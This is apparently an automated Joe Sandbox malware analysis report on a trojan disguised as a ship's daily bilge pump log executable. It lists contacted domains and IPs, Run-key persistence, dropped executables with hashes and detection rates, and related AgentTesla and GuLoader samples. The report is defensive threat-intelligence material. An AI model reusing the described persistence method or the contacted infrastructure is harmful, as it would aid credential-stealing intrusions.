C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	65%	Virustotal		Browse
C:\Users\user\AppData\Roaming\newfile\newfile.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\newfile\newfile.exe	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
crediperu.pe	0%	Virustotal		Browse
mail.crediperu.pe	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://crediperu.pe	0%	Avira URL Cloud	safe
http://mail.crediperu.pe	0%	Avira URL Cloud	safe
http://admin-pp.crodip.fr/depots/_parametres/cr_RapportInspection.rpt	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://admin-pp.crodip.fr/pdf/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://mail.crediperu.pe	0%	Virustotal		Browse
http://admin-pp.crodip.fr/admin/diagnostic/get-pdf-view?id=	0%	Avira URL Cloud	safe
http://admin-pp.crodip.fr/depots/_parametres/cr_RapportInspection.rpt	0%	Virustotal		Browse
http://admin-pp.crodip.fr/pdf/	0%	Virustotal		Browse
http://www.founder.com.cn/cn/bThe	0%	Virustotal		Browse
http://www.founder.com.cn/cn	0%	Virustotal		Browse
http://www.zhongyicts.com.cn	1%	Virustotal		Browse
http://crediperu.pe	0%	Virustotal		Browse
http://www.founder.com.cn/cn/cThe	0%	Virustotal		Browse
http://admin-pp.crodip.fr/admin/diagnostic/get-pdf-view?id=	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high
crediperu.pe	158.106.134.182	true	false	0%, Virustotal, Browse	unknown
mail.crediperu.pe	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crediperu.pe	InstallUtil.exe, 00000010.00000002.4151678724.0000000003354000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	InstallUtil.exe, 00000010.00000002.4157281481.0000000006650000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.4151678724.0000000003354000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://account.dyn.com/	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 0000000E.00000002.3568807416.000000000411C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp	false		high
http://admin-pp.crodip.fr/depots/_parametres/cr_RapportInspection.rpt	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, dll.exe.8.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.crediperu.pe	InstallUtil.exe, 00000010.00000002.4151678724.0000000003354000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.tiro.com	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://admin-pp.crodip.fr/pdf/	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, dll.exe.8.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com	InstallUtil.exe, 00000010.00000002.4151678724.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	InstallUtil.exe, 00000010.00000002.4151678724.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://admin-pp.crodip.fr/admin/diagnostic/get-pdf-view?id=	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, dll.exe.8.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
158.106.134.182	crediperu.pe	United States		63410	PRIVATESYSTEMSUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417526
Start date and time:	2024-03-29 15:01:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@25/11@2/3
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 98% Number of executed functions: 227 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target newfile.exe, PID 1744 because it is empty
Execution Graph export aborted for target newfile.exe, PID 2364 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:02:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run program C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe
14:02:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run program C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe
14:05:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
14:05:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
15:02:03	API Interceptor	193x Sleep call for process: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe modified
15:02:38	API Interceptor	16x Sleep call for process: PING.EXE modified
15:03:58	API Interceptor	219x Sleep call for process: dll.exe modified
15:05:05	API Interceptor	30x Sleep call for process: InstallUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	Stealer.exe	Get hash	malicious	Eternity Stealer	Browse	ip-api.com/json
	DHL_LHER000678175.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	assento 555 pro-Model-2.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	ocrev ns.ordine 290520280324.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	YPT23-117419 numaral#U0131 Dekont-20240328.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	FedEx_AWB#53203024643.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	QUOTATION_MARQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	T_240369_S#U0130PAR#U0130S.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	QUOTATION_MARQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exe	Get hash	malicious	PureLog Stealer, Xehook Stealer	Browse	ip-api.com/json/?fields=11827

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	Stealer.exe	Get hash	malicious	Eternity Stealer	Browse	208.95.112.1
	DHL_LHER000678175.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	assento 555 pro-Model-2.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	ocrev ns.ordine 290520280324.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	YPT23-117419 numaral#U0131 Dekont-20240328.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	FedEx_AWB#53203024643.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	QUOTATION_MARQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	T_240369_S#U0130PAR#U0130S.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	QUOTATION_MARQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exe	Get hash	malicious	PureLog Stealer, Xehook Stealer	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PRIVATESYSTEMSUS	awb_shipping_doc_23642.vbs	Get hash	malicious	FormBook, GuLoader	Browse	158.106.139.211
	Zuvillaga - I, SL P.Order 25621348 2609.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	209.42.192.234
	GRAF Ib#U00e9rica, Tecnolog#U00eda del Pl#U00e1stico, S.L.U. P.Order 45621748 26085..vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	209.42.192.234
	9wDlG5DeRK.elf	Get hash	malicious	Moobot	Browse	204.197.243.235
	https://jagurihgroup.com/wader/steerable/?a=dj7BxaR5P3DM9rD	Get hash	malicious	Phisher	Browse	162.211.83.77
	Richiesta dofferta _2345_2024395_PDF.vbe	Get hash	malicious	AgentTesla, GuLoader	Browse	209.42.192.234
	FAV TOO CRYPT.exe	Get hash	malicious	AgentTesla	Browse	67.222.24.48
	Mapa Quantidades 2403120_PDF.vbe	Get hash	malicious	AgentTesla, GuLoader	Browse	209.42.192.234
	RFQINL0607_Commerical list_pdf.vbe	Get hash	malicious	AgentTesla, GuLoader	Browse	209.42.192.234
	ART#U00cdCULOS IPAR-YATCHS EN LA LISTA DE ORDEN DE COMPRA ADJUNTA..vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	209.42.192.234
TUT-ASUS	Stealer.exe	Get hash	malicious	Eternity Stealer	Browse	208.95.112.1
	DHL_LHER000678175.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	assento 555 pro-Model-2.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	ocrev ns.ordine 290520280324.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	YPT23-117419 numaral#U0131 Dekont-20240328.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	FedEx_AWB#53203024643.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	QUOTATION_MARQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	T_240369_S#U0130PAR#U0130S.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	QUOTATION_MARQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exe	Get hash	malicious	PureLog Stealer, Xehook Stealer	Browse	208.95.112.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\newfile\newfile.exe	proforma 8133197 of 1007332009.pdf.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	RFQ-120324_pdf.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	POs#U034fx#U034fl#U034fx#U034f..exe	Get hash	malicious	AgentTesla	Browse
	New Orders#U034fx#U034fl#U034fx#U034f..exe	Get hash	malicious	AgentTesla	Browse
	#U00d6deme Onay#U0131 Kopyas#U0131.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	r__demeOnay__Kopyas__.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	odeme_kopyasi.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	O7HM6KX2ce.exe	Get hash	malicious	AgentTesla	Browse
	CBD_USD_REFERENCE_3901828872899399391108390100110929111.exe	Get hash	malicious	AgentTesla	Browse
	passportscan.hta	Get hash	malicious	XWorm, zgRAT	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.log

Download File

Process:	C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dll.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
MD5:	7B709BC412BEC5C3CFD861C041DAD408
SHA1:	532EA6BB3018AE3B51E7A5788F614A6C49252BCF
SHA-256:	733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
SHA-512:	B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\newfile.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\newfile\newfile.exe
File Type:	CSV text
Category:	modified
Size (bytes):	1089
Entropy (8bit):	5.3331074454898735
Encrypted:	false
SSDEEP:	24:ML9E4KlKNE4oK2nMK/KDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlIHoVnM6YHKh3oPtHo6hAHKzeR
MD5:	E54FE55F93C5501D5C4737CCF0E6E48B
SHA1:	BEF9C1A7166E3E8C2C7762C42F8FCBB753B63283
SHA-256:	2434AE4C4C8436A64A4F3317638DF77C38CB7FFC226037ADE1DC6F6CD4745619
SHA-512:	5422F02595B12ACFE23AF8C69ACF43B5529C700FC3FA5ADEDDBDFF36737C22D7AE23FCD4A39869DF6D02D7D708F951142983E60ED90EADFDCE5CC40B164AD19D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\48ee4ec9441351bbe4d9095c96b8ea01\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\Nati

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	988672
Entropy (8bit):	6.433026934770898
Encrypted:	false
SSDEEP:	12288:gSBcpm64v7Zh6PsSUkynkGZe2uIgAKpZR0uC9EqZnEMs1Ts2Q0kdCDbjq/GrrzCg:gSyj4v7KPsbkrDjIWR0uuLs1RJ
MD5:	3FF8DAE4FEA5DDD0D045AF07D3CE8016
SHA1:	E15F1B3C589DC0EC3C9DE7F501A259B73CE62482
SHA-256:	F1C0FF1F0BC852D09A15805AF1BD83A32EABF5B5412A9B43053ECFB8CB03250B
SHA-512:	72563CF8EB2BB294B5A7F457298225D3C4CA2283CBA4911DDBE6F6AFA0DEB2A9A856F30491E638BE86C8DA36B4075C5CDC7E54B97ECCD7AAFFB6875D18655399
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61% Antivirus: Virustotal, Detection: 65%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..&............................./... ...@....@.. ....................................`................................../..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................./......H............R..........Xi..~s..............................................8:..#yDEj.B.d.\|......f....x..........S*......%.......c.`.....,..t....1..T.%....#.e..YP..du_.p...9\z.b+..MA..S..Kf....%..K../.w..s....y+7.v,c0v<..?0...T...4............L.....%97..v....m.......a.l.a..L.y..0......G..F.z..a....L&......R.Sj...._.F.r.=.u8J9\|........$..k.......I....U.v...9.gP..~b.#...].......s\|....&.H/m.tN.%....q.=..2....X.U..F(x_.......S(...X..r...n._(...r..V...{T.W.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
